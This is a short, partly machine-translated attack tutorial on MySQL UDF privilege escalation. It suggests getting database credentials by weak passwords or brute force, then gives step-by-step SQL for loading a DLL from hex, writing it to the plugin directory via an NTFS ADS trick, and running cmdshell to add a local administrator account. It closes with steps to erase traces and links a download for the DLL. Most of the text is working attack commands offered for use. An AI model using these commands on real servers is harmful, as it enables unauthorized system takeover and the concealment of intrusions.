1. Summary of the method of extracting rights on UDFs
Through the weak password, blasting, Web site configuration files and other ways to get the MySQL database account password,---to be able to connect
(1). Declare the 16 decimal number of the Udf.dll code to the my_udf_a variable
set @my_udf_a=concat(‘‘,dll的16进制);
(2). Build table My_udf_data, field data, type Longblob.
Udf.dll
Https://pan.baidu.com/s/1FY8Ej1tMDGdbb5OEcx3BgA
create table my_udf_data(data LONGBLOB);
(3) Update the My_udf_data table to the data in the @my_udf_a.
insert into my_udf_data values("");update my_udf_data set data = @my_udf_a;
(4) View DLL export path
Mysql<5.0,导出路径随意;5.0<=mysql<5.1,则需要导出至目标服务器的系统目录(如:system32),否则在下一步操作中你会看到“No paths allowed for shared library”错误;mysql>5.1,需要导出dll到插件路径,插件路径可以用下面这条命令查看:show variables like ‘%plugin%‘;
(5) Export the DLL
The name of the. dll can be named arbitrarily
* In some cases , we will encounter the situation of can ' t open shared library, we need to export Udf.dll to Lib\plugin directory, but by default, plugin does not exist, what should I do? It's good to have Daniel. Methods of creating folders using NTFS ads streams
select @@basedir; //查找到mysql的目录select ‘It is dll‘ into dumpfile ‘C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION‘; //利用NTFS ADS创建lib目录select ‘It is dll‘ into dumpfile ‘C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION‘;//利用NTFS ADS创建plugin目录
(6) The right to be raised by Cmdshell function
select cmdshell(‘net user x x /add‘);
select cmdshell(‘net localgroup administrators x /add‘);
(7) Erase traces:
drop table my_udf_data;drop function cmdshell;
2.UDF Trojan Lift Right
Enter the database account password
Follow the instructions to
The right of-----mysql-udf